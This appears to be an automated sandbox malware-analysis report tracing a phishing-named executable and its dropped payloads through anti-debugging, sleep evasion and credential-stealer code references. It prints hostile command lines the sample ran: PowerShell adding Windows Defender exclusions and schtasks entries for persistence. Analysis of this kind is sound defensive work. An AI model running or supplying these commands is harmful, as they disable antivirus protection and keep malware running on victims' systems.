                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8132Thread sleep time: -59040000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8132Thread sleep time: -60000s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                          Source: Microsofts.exe, 00000013.00000002.2945501820.0000000000792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1805369474.0000000006AA3000.00000004.00000020.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1805369474.0000000006AAA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1751167364.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1769440706.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2061282254.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1812669200.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2508497113.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2321199892.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2319647398.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2301823997.00000000005D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: alg.exe, 0000000B.00000003.2043821981.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPy]%SystemRoot%\system32\mswsock.dll
                          Source: AppVClient.exe, 0000000F.00000003.1739183245.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000002.1740187584.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1739103187.000000000049F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                          Source: zeXKjViL.exe, 00000022.00000002.1998728250.0000000001192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`%
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeAPI call chain: ExitProcess graph end nodegraph_8-22134
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 19_2_0245C168 LdrInitializeThunk,LdrInitializeThunk,19_2_0245C168
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004A0994 mov eax, dword ptr fs:[00000030h]8_2_004A0994
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BD1130 mov eax, dword ptr fs:[00000030h]8_2_02BD1130
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02C13F3D mov eax, dword ptr fs:[00000030h]8_2_02C13F3D
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0040ADB0 GetProcessHeap,HeapFree,8_2_0040ADB0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040E61C
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00416F6A
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004123F1 SetUnhandledExceptionFilter,8_2_004123F1
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02C11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02C11361
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02C14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_02C14C7B
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Microsofts.exe.8.dr, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                          Source: Microsofts.exe.8.dr, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                          Source: Microsofts.exe.8.dr, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp"
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BF8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,FreeSid,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,8_2_02BF8550
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: GetLocaleInfoA,8_2_00417A20
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
